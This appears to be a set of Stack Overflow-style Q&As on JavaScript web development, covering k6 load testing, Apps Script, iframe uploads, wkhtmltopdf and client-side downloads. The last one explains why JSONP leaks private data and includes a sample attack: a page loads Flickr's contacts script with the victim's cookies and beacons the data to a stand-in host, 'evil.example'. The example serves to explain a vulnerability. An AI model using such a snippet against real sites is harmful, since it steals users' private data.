New to k6, working with a web application that briefly presents a spinner on the home page while CSS and JS files load.
Once the files are loaded and scripts are available, a login form is added (replacing the spinner).
With k6, is there a way to wait until a specific element (the login form) is available in the body before continuing with the next step (i.e., populating the username and password and submitting the form to log in)?
Currently, when I review the response body, I see the spinner element only. Adding a delay does not appear to affect the body returned, even though the login form should, in theory, have been added to the page.
If the element is added to the body after the initial page load, will it be detected by k6 and made available in the response?
Thanks for your help.
Bill
k6 doesn't work like a browser - the load tests are written in JavaScript, but when you request an HTML file, the JavaScript in that file isn't executed. It usually can't be executed even with eval() or something similar, since k6 doesn't have a DOM or any of the usual browser APIs. So you have to explicitly specify any HTTP requests you want your k6 script to make, and in your case I assume that the spinner and login form are generated by JavaScript somewhere in the home page.
To simplify working with such highly dynamic websites when you use k6, you can use the site normally in your browser, record the browser session as a .har file and export it, and then convert that .har file to a k6 script with the k6 convert command like this: k6 convert session.har -O k6_script.js. You can find more information about the whole process here.
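For example, a hand-written script for your case might look something like this (a minimal sketch - the /login path, form field names, and status check are assumptions about your app, not known values):

import http from 'k6/http';
import { check } from 'k6';

export default function () {
  // Fetch the home page; k6 will not run its JavaScript or render the spinner
  http.get('https://example.com/');

  // Explicitly make the request that the login form's JavaScript would have made
  const res = http.post('https://example.com/login', {
    username: 'testuser',
    password: 'testpass',
  });

  check(res, { 'logged in': (r) => r.status === 200 });
}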
k6 doesn't execute client-side code, nor does it render anything. It makes requests against the target system and loads the responses. This makes it efficient at issuing a large number of requests, but it creates new problems that must be solved in certain cases:
1. Capturing all the necessary requests - typically, using k6 convert on a HAR file works well to give you the foundation of a script. I suggest using the converter's other options, e.g. --only or --skip, to limit third-party requests. More info here: https://support.loadimpact.com/4.0/how-to-tutorials/how-to-convert-har-to-k6-test/
2. Since you recorded your browser session, if your application/site uses anything to prevent CSRF attacks, you must handle those values/correlate them. e.g. .NET sites use VIEWSTATE; if you were testing a .NET app, you would need to instruct the VUs to extract the VIEWSTATE from the response body and reuse it in the requests that require it (see the sketch after this list).
3. In a similar vein to point 2, if you are submitting a form, you probably don't want to use the same details over and over again. That typically just tests how well your system can cache, or it results in failing requests (if you are logging in and your system doesn't support concurrent logins for the same user, as one example). k6 can use CSV or JSON data as a source for data parameterization. You can also generate some of this inline if it's not too complex. Some examples are here: https://docs.k6.io/docs/open-filepath-mode
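A rough sketch tying points 2 and 3 together (the field names, file name, and URLs are hypothetical):

import http from 'k6/http';

// Point 3: load credentials once, in the init context, from a local JSON file
// e.g. [{"user": "u1", "pass": "p1"}, {"user": "u2", "pass": "p2"}]
const users = JSON.parse(open('./users.json'));

export default function () {
  const creds = users[__VU % users.length];

  // Point 2: fetch the form and extract the anti-CSRF value from the body
  const page = http.get('https://example.com/login');
  const viewstate = page.body.match(/name="__VIEWSTATE" value="([^"]+)"/)[1];

  // Send the extracted token back along with the parameterized credentials
  http.post('https://example.com/login', {
    __VIEWSTATE: viewstate,
    username: creds.user,
    password: creds.pass,
  });
}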
I currently have a website that automates Instagram actions: http://instapromobiz.com. It is almost entirely JavaScript-based, with some PHP to post to databases. Users log in and an entry is created in a MySQL database containing their username and how many credits they have (1 credit = 1 action). Users then add tags and press start, the JavaScript makes requests via Instagram's API, and AJAX + PHP is used to update their database.
The issue is that when the user leaves the page, or even refreshes it, the script will stop. Otherwise it will run forever.
I have a JavaScript file that contains all the functions needed to run the script until the user stops it.
My question is: can I use Google Apps Script to host this .js file so that the script continues to run when the user leaves the page? I've uploaded the code and published it, but I can't figure out how to access it from an external website.
Node.js is out of the question, I'd rather not convert the whole site to PHP (I don't know PHP well), and a cron job won't work because of all the JavaScript.
Any help would be great, thanks!
Apps Script is going to be limited to a 5 minute execution time. You could create time-based triggers to work around that limit to some extent, but the script will stop 5 minutes after being invoked.
If you still think Apps Script is a good fit, you would just need to deploy your script as a web app and use a doGet(event) or doPost(event) function to receive the request from your external application. If you need to return content, there is ContentService to help facilitate that part of the process.
To maintain the different data points for each user, you will need to use PropertiesService.getUserProperties() to store persistent string values for each user.
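A minimal sketch of that wiring (the action names and property key are made up for illustration):

// Runs when the external site calls the web app URL, e.g.
// https://script.google.com/macros/s/DEPLOYMENT_ID/exec?action=getCredits
function doGet(e) {
  var props = PropertiesService.getUserProperties();

  if (e.parameter.action === 'getCredits') {
    // Return the stored per-user value as plain text
    return ContentService.createTextOutput(props.getProperty('credits') || '0')
      .setMimeType(ContentService.MimeType.TEXT);
  }

  if (e.parameter.action === 'useCredit') {
    var remaining = parseInt(props.getProperty('credits') || '0', 10) - 1;
    props.setProperty('credits', String(remaining));
    return ContentService.createTextOutput(String(remaining))
      .setMimeType(ContentService.MimeType.TEXT);
  }

  return ContentService.createTextOutput('unknown action');
}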
The other part of Apps Script that may come into play with your JavaScript is that Apps Script uses Caja sanitization for JavaScript (just something to be mindful of if you run into issues).
If you MUST defeat the execution time problem in Google Apps Script, you can monitor the execution time and, at a certain point before time expires, invoke the script recursively, passing it a parameter indicating where it left off.
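Something along these lines (processItem, TOTAL_ITEMS, and the property key are placeholders for your actual work and state):

var TOTAL_ITEMS = 1000;                 // placeholder: however much work there is
var MAX_RUNTIME_MS = 4.5 * 60 * 1000;   // stop safely before the execution limit

function runBatch() {
  var start = Date.now();
  var props = PropertiesService.getScriptProperties();
  var index = parseInt(props.getProperty('lastIndex') || '0', 10);

  while (index < TOTAL_ITEMS) {
    if (Date.now() - start > MAX_RUNTIME_MS) {
      // Out of time: save progress and schedule another run in one minute
      props.setProperty('lastIndex', String(index));
      ScriptApp.newTrigger('runBatch').timeBased().after(60 * 1000).create();
      return;
    }
    processItem(index); // placeholder for the real per-item work
    index++;
  }
  props.deleteProperty('lastIndex'); // finished
}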
I need to upload a file with a form in a single-page (AJAX) web application, but the file is useless without the rest of the data on the form in that panel. There are only three INPUTs, but one can be quite a lengthy text area. How can I capture this?
If I upload the file using an isolated AJAX file-upload technique (like the Fine Uploader http://fineuploader.com/ widget), then I have to handle two counter-intuitive elements:
CLIENT: The user transmits the file, the main part of the transaction, before actually approving the transaction. They then wait for this to complete, even if they decline to continue. The UI must disable screen elements to prevent the scenario where a client might submit the associated data before or during the file upload. It's extra effort to send the file at the wrong point in the process.
SERVER: It requires a ticketed cache. The back-end must cache the uploaded file and provide the client with a ticket for it; the client must then send this ticket with the upcoming request (sketched below). Ideally, the cache should also clean up old tickets under various circumstances, such as when the form is cancelled, another file is uploaded, or the user session times out. More extra work (although this ticketed-cache functionality would be nice to have in my server).
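For illustration, the client side of that ticketed flow would look something like this (the endpoint and field names are invented, and the upload widget's completion callback is hand-waved):

// Hold the ticket the server issues when the isolated upload finishes
var fileTicket = null;

// Wire this up as the uploader's completion callback; assume the server
// responds with JSON like {"ticket": "a1b2c3"}
function onUploadComplete(response) {
  fileTicket = response.ticket;
}

// Later, when the user actually submits the form, send the ticket along
$('#panel-form').on('submit', function (e) {
  e.preventDefault();
  $.post('/api/save', {
    ticket: fileTicket,
    title: $('#title').val(),
    notes: $('#notes').val()
  });
});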
Is it a sensible solution to instead place the whole form in an IFRAME? Will I have problems manipulating that and making it appear to be a well-integrated part of the single-page application? I've always stayed away from them in the past.
My platform is jQuery, ASP.NET MVC, the usual browsers (plus probably mobile).
This was pretty easily resolved in my case by simply setting the target of the form post (including file and text inputs) to a non-visible iframe and watching for the iframe's onload event.
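In outline, it looks something like this (the IDs, field names, and action URL are whatever your app uses):

<form id="upload-form" action="/upload" method="post"
      enctype="multipart/form-data" target="upload-target">
  <input type="file" name="file">
  <textarea name="notes"></textarea>
  <input type="submit" value="Save">
</form>

<!-- Non-visible iframe that receives the form post -->
<iframe id="upload-target" name="upload-target" style="display:none"></iframe>

<script>
  // Fires when the server's response has loaded into the hidden iframe
  $('#upload-target').on('load', function () {
    // Inspect the iframe's contents for the result if needed, then update the UI
    alert('Upload complete');
  });
</script>

Because the file and the text inputs travel in the same post, there is no ticketed cache and no window where the data can arrive without the file.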
I'm having trouble figuring out how to generate, on the server side, a PDF from a JavaScript-heavy webpage served from Tomcat (the application is Pentaho CE). The content is a dashboard that responds to user interaction; Pentaho replaces divs dynamically with various content through AJAX calls. I'd like to export to PDF whatever state the user has the dashboard in. There are no restrictions on what I can put on the server, but I need to avoid having the client install anything.
I've taken a look at this, along with a bunch of other google-fu:
JSP/HTML Page to PDF conversion
wkhtmltopdf seems to be a popular choice; before I start banging my head against it, I have a few questions:
Can wkhtmltopdf handle password-protected JSPs where authentication is handled by the application? Would the dynamically loaded divs break it?
Is there a way to perhaps return the client view to the server for processing? I read about screen capturing...
Another option that could work would be to automate local access to the dashboard on the server through a server-hosted web browser and generate a PDF that way... is this possible, given the constraints of Tomcat and application-handled password protection? The JavaScript components that Pentaho generates cannot be accessed outside of the application.
Thanks!
EDIT:
Good news! wkhtmltopdf works! Kind of. I got past the password authentication by putting the login details in a query string, and I'm getting a PDF of the correct page now. The issue is that no JavaScript components are showing up... (they work for pages like yahoo.com, so maybe I'm missing something here).
If you have a lot of AJAX calls you should wait for them. Use the --javascript-delay x argument, where x is the time to wait in milliseconds before rendering, e.g. wkhtmltopdf --javascript-delay 5000 <dashboard-url> output.pdf.
All my research so far suggests this can't be done, but I'm hoping someone here has some cunning ideas.
I have a form on a website which allows users to bulk upload lots of URLs to add to a list on the server. There's quite a lot of server-side processing to do on each URL, so to avoid timeouts and to display progress, I've implemented the upload using jQuery to submit the URLs one at a time using ajax.
This is all working nicely. However, part of the processing on each URL is deduplicating it against the complete list. The ajax call returns a status indicating either a successful upload or a rejection due to duplication. As the upload progresses, I tell the user how many URLs have been rejected as duplicates (along with overall progress and ETA).
The problem now is how to give the user a complete list of the failed duplicate URLs. I've kept them in an array in my jQuery, and would like the user to be able to click on a link on the form to download a text file containing those URLs. Is this possible just using client-side processing?
The server-side processing basically handles a single keyword at a time. I'd rather not have to store the duplicates in a database table with some kind of session key which gets sent with every ajax call, and is then used at the end to generate the text file server-side (and then gets cleaned up some time later). I can see how to do this, but it seems very clunky and a bit 20th century.
I haven't used it myself yet, but Downloadify was built for exactly this purpose, I think.
Downloadify is a tiny JavaScript + Flash library that enables the generation and saving of files on the fly, in the browser, without server interaction.
It was created by Doug Neiner who is also pretty active on Stack Overflow.
It needs Flash 10 to work.
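Usage is roughly like this (duplicateUrls being the array you already keep in your jQuery code; the element ID and asset paths are assumptions):

Downloadify.create('download-duplicates', {
  filename: 'duplicate-urls.txt',
  data: function () {
    // duplicateUrls is the array of rejected URLs collected during the upload
    return duplicateUrls.join('\r\n');
  },
  onComplete: function () { alert('File saved.'); },
  onError: function () { alert('Nothing to save.'); },
  swf: 'media/downloadify.swf',          // path to the bundled Flash movie
  downloadImage: 'images/download.png',  // the clickable button image
  width: 100,
  height: 30,
  transparent: true,
  append: false
});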
This flickr blog post discusses the thought behind their latest improvements to the people selector autocomplete.
One problem they had to overcome was how to parse and otherwise handle so much data (i.e., all your contacts) client-side. They tried getting XML and JSON via AJAX, but found it too slow. They then had this to say about loading the data via a dynamically generated script tag (with callback function):
JSON and Dynamic Script Tags: Fast but Insecure
Working with the theory that large string manipulation was the problem with the last approach, we switched from using Ajax to instead fetching the data using a dynamically generated script tag. This means that the contact data was never treated as string, and was instead executed as soon as it was downloaded, just like any other JavaScript file. The difference in performance was shocking: 89ms to parse 10,000 contacts (a reduction of 3 orders of magnitude), while the smallest case of 172 contacts only took 6ms. The parse time per contact actually decreased the larger the list became. This approach looked perfect, except for one thing: in order for this JSON to be executed, we had to wrap it in a callback method. Since it's executable code, any website in the world could use the same approach to download a Flickr member's contact list. This was a deal breaker. (emphasis mine)
Could someone please go into the exact security risk here (perhaps with a sample exploit)? How is loading a given file via the "src" attribute in a script tag different from loading that file via an AJAX call?
This is a good question, and this exact sort of exploit was once used to steal contact lists from Gmail.
Whenever a browser fetches data from a domain, it sends across any cookie data that the site has set. This cookie data can then be used to authenticate the user and fetch user-specific data.
For example, when you load a new stackoverflow.com page, your browser sends your cookie data to stackoverflow.com. Stackoverflow uses that data to determine who you are, and shows the appropriate data for you.
The same is true for anything else that you load from a domain, including CSS and JavaScript files.
The security vulnerability that Flickr faced was that any website could embed this JavaScript file hosted on Flickr's servers. Your Flickr cookie data would then be sent over as part of the request (since the script was hosted on flickr.com), and Flickr would generate a JavaScript document containing the sensitive data. The malicious site would then be able to access the data that was loaded.
Here is the exploit that was used to steal google contacts, which may make it more clear than my explanation above:
http://blogs.zdnet.com/Google/?p=434
If I were to put an HTML page on my website like this:
<script src="http://www.flickr.com/contacts.js"></script>
<script> // send the contact data to my server with AJAX </script>
Assuming contacts.js uses the session to know which contacts to send, I would now have a copy of your contacts.
However if the contacts are sent via JSON, I can't request them from my HTML page, because it would be a cross-domain AJAX request, which isn't allowed. I can't request the page from my server either, because I wouldn't have your session ID.
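To make the attack concrete: if contacts.js wrapped the data in a call such as processContacts({...}), the malicious page only has to define that function before loading the script (the callback name here is illustrative):

<script>
  // Attacker defines the callback that Flickr's script will invoke
  function processContacts(data) {
    // The victim's contact list arrives as a plain object; ship it off
    // to the attacker's server via an image beacon
    new Image().src = 'http://evil.example/steal?d=' +
        encodeURIComponent(JSON.stringify(data));
  }
</script>
<!-- The browser attaches the victim's flickr.com cookies to this request -->
<script src="http://www.flickr.com/contacts.js"></script>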
In plain English:
Unauthorised computer code (JavaScript) running on people's computers is not allowed to get data from anywhere but the site on which it runs - browsers are obliged to enforce this rule (the same-origin policy).
There is no corresponding restriction on where code can be sourced from, so if you embed data in code, any website the user visits can employ the user's credentials to obtain the user's data.